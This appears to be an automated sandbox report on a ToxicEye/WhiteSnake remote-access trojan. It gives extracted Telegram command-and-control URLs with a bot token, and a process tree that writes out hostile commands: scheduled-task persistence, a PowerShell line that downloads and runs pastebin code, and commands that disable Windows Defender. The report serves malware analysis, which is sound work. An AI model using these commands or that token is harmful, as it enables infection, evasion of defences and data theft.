Analysis
-
max time kernel
571s -
max time network
573s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
-
submitted
05-01-2025 12:33
Errors
General
-
Target
https://gofile.io/d/tBP4oE
Malware Config
Extracted
toxiceye
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendMessage?chat_id=8130842755
Extracted
gurcu
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendMessage?chat_id=8130842755
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdate
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=1
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022219
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022220
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022221
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022222
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022223
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022224
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendPhoto?chat_id=813084275
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/getUpdates?offset=99022225
Signatures
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
ToxicEye
ToxicEye is a trojan written in C#.
-
Toxiceye family
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
NTFS ADS 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/tBP4oE1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffffaf746f8,0x7ffffaf74708,0x7ffffaf747182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x114,0x110,0x12c,0x14c,0x7ff662bb5460,0x7ff662bb5470,0x7ff662bb54803⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5976 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4900 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\TelegramRAT.exe"C:\Users\Admin\Downloads\TelegramRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9FCA.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9FCA.tmp.bat3⤵
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4260"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind ":"4⤵
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Users\ToxicEye\rat.exe"rat.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/home5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffffaf746f8,0x7ffffaf74708,0x7ffffaf747186⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c powershell "irm "pastebin.com/raw/1nfKw4aY" | iex"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm "pastebin.com/raw/1nfKw4aY" | iex"6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath '%TEMP%'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess powershell.exe7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess Lnk.exe7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess svchost.exe7⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\PngMbrBuilder.exe"C:\Users\Admin\AppData\Local\Temp\PngMbrBuilder.exe"7⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Users\Admin\Downloads\TelegramRAT.exe"C:\Users\Admin\Downloads\TelegramRAT.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5128 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,2845164799758881239,6911558148570206920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x304 0x3a41⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
660B
MD5631aa7b352bb697733b86bf28738ccca
SHA108ecaf07c7f1219401c3c3b13754579ac1f19797
SHA2563e004976bae302cf7c53f5d15b5175eecb851bd4eb49a9b9365f716a6ee27523
SHA5122b456313b5d85160f96abfb4d4190c629063842bd48afbd1c9f87cc0978b2f9e758d4922c977418221a2df361fd0687975ad0c7a1c1367d8ae813c153cd98747
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
11KB
MD555530aff2fb1a0b8aab90d6d052ab498
SHA10bc6b88c4ee1f2f2669506c648c0330dcd3c2c46
SHA256e41b2fbaae6473f9fe09f1a4eff6120040f047c456a85aa04f18f93988e3e377
SHA512c6fbd2dbc6821634f94a5cb08368e634d63f95000d8657e2d6bc13a8b89b989c25955e3538ad0b22193b8ee6ebcc7b0fc2a2fb13d20cec77b92a8dc767ba82ca
-
Filesize
152B
MD5aee441ff140ecb5de1df316f0a7338cd
SHA182f998907a111d858c67644e9f61d3b32b4cd009
SHA2565944b21c8bdfb7c6cb0da452f8904a164cc951c6a4bb3a306eaebcad2d611d67
SHA51254a2c1d4c8791ebc6324c1be052b7b73cbd74057d0ea46400cfd8e60f9a884ade60d838777eba7001cf44c924f63cba1a9708a6c71bf966f63f988c49ca70d31
-
Filesize
152B
MD5b2ea5b61033e3ed22eb2e24b1a46367d
SHA1f7bb6f10eff1cee51ee847197564e9e8179ee77f
SHA25666e471be11520e6f41d5ce0fed69df262face54968ea0b8db2dc11e8cad200d9
SHA51227d1a7c805e95e70abb61538b7ba3419f4296da2740024578ec8085d5af3da1aa80ad3db4572505f4e08ea68a43ddbc672d3d035d882079eebb62a230ad1c26a
-
Filesize
152B
MD5821b1728a915eae981ab4a4a3e4ce0d1
SHA18ba13520c913e33462c653614aece1b6e3c660a2
SHA25636c38bde1e74c5ee75878f275a411e528c00eaa3091e7c4adfa65b8b7d28fb3b
SHA512b8fd54808711878ed567f474f174db662e2457b6c246f625e148944532c70d94d87e96ef6febfb657895dd0eadc25906c9106fa75c6b2d3bd37ca6786f03a8b7
-
Filesize
144B
MD512d1f42a4fce98ee553856fa09d80e70
SHA1fa3481eaa90e8594f0168d237a63147fbe92ec89
SHA2566d1dc676f45b7102034871c5af22754a3e75cad96cbd751b29a727e1063ab3b4
SHA5121b038a507b7942c76da32b115557af0738961d82f23f92ba16da2842e6d9e442b77911c0d5b9aa6bf4bc8aa0263810e260376622ddf035ba568caddac9f6c697
-
Filesize
144B
MD5206e59d0812d64e0dbb7b7d39808c994
SHA1121a1fcd4ba9b2f5729b5b560f49c80ba32db1b8
SHA25665aa16fa2ba4258af9aee31cb2a3fee187692235de098377366e13c25ea3205d
SHA51206eeb36179b8b72e388b235f92932a61f454637cc74281b4747ba3a8a07f7c75e0acfd966b44defbb946f22f14660453ebb10406f18f09e53db9804febe9c9fb
-
Filesize
48B
MD541c92401b53d6adea553b6000606b0f0
SHA1b800fc41d2a17844f899e68ebda32be5b5ed44cc
SHA256d607a73f0e919f0057d7672883d6f927116237448ca6bf53d0494f8310db4fb5
SHA512c0cb9c6dae419f53a673255a43443ccf653950fa2d614decdf5ea6f7e61a7f34e022864ad163f5b214b651bf04bcbdea7d56eea960b8196bb61455298ae210b6
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
399B
MD525825d90d1b9ee75a7d57fe258d4e9ac
SHA1049c359c016e3973f9656acfb730afc97b2c8a47
SHA256abe59438ea9efc3795399242a90ad5d35b030080e1e0e5fa99cf0ea975608483
SHA5127c60456d8960d18cfe0a3e35d9b8a2cf5a7ae6a15081362fc81eef4251cb75240f4496216d9458d07fffbdb4158e939da7a0c6954dc17230a70d496f2e3507d8
-
Filesize
469B
MD56aa2c2410b1b5c7bc8134a88c0a5a294
SHA1660ab5f136f123353454641475db670ccdee8688
SHA25659e14b116a13b06eb8c236112fd880861492d55f95f8726b0be096a994d58f63
SHA512f00778bc26019370a7bee3575a94443b110c8c381ff469bbbe73064d3453193aade8d1b97c24b653f8a63540374ebb431d4a64fc4933fc62be3f695de9dcd36c
-
Filesize
59B
MD52800881c775077e1c4b6e06bf4676de4
SHA12873631068c8b3b9495638c865915be822442c8b
SHA256226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
Filesize
5KB
MD53b09b92af18d94f55bc1926f49606c5d
SHA1d776f8ca5ddcd156a2a263f4f3b2500504858599
SHA2569ad7cccd33ac68ed7f3d6f6a5c7a7f48689b2f6a2016e10ef34cbcbbfac50825
SHA512b2ad8b9148582de92f65d4740d23917e77d02761462bb8d66cb25a7c311c741ccce56f4f01fe7e6b89bdb2097f53fcda99519627e8f5d4ce7e07cf7c35c50df8
-
Filesize
5KB
MD58aa24622b17a2cf7586991f99cdcd9b0
SHA1f4933cb5ba7a90094f16abf691d4c99ae42e400b
SHA256877c11f6cb28ba3b3207ccb43d21e8f8a6c69e269e1ba2c143e5a58db5d7cb4e
SHA5122855969489af09986d782e00d58d9fba159726d34b21130c799ebc92decbc4bee501686f297e5c6de501fafa006f07021abc8288607e3c13bde1dd97abdc0275
-
Filesize
6KB
MD5148275263de5a66c3d9c080324e2c279
SHA146887b448366bd918ec752bd15daf87ff2e20092
SHA256b1b0763e2bc5effe8d0d1a843cfc65266f290f7f8752a19538db5864857020ac
SHA5124cf83592167908b5f0f79ed63437e1320d5e9e78ff9d7fb2ad21565e3d1e87795f8bd514031aff7bf3bec1a33df571e9e997082c3fb5917ded70ebab9063fbae
-
Filesize
6KB
MD513fe0c7db12a01f6903b34985e97ef73
SHA14e6df612236ef922208822e356e124cdc65aad5c
SHA256ce6356e95ae7592b36faf6dbcd7d1e563983262fd0cc47a8f48388d1b9be402f
SHA512fcd728a934745deebe3ad0b4afa6d038bf2aed4a373928434de51dc0026731768737dc954911f4424cf2314de1a9043f86410cfbcd46cacaace137b6530c904d
-
Filesize
6KB
MD5e958f23fde72b0bb12564d95509f8a7c
SHA1b4c52c5c1c4aa61fb655cbc484aea70cc57143a8
SHA2567fa9d9f52b80ab0f7dc4f53f9aef00c114ac9c1c73f15219702a841ed48d3656
SHA5129b7197b19c26b054de9588ac7c64f8ebb1c604b83420a9aa253f36ccfcff246e84df5ffe056d73e8d0e25d945768315a7742bf6e57bfd0852782100c24e71ec0
-
Filesize
24KB
MD540054cb73dd68fcf513186a36e7b28b1
SHA1782f64c46affe72bd6b334c69aae88aa32216b2d
SHA256136f61f0d620207ec049ca6889378a9e89d998a6ef15fbd2a8095482d8d88118
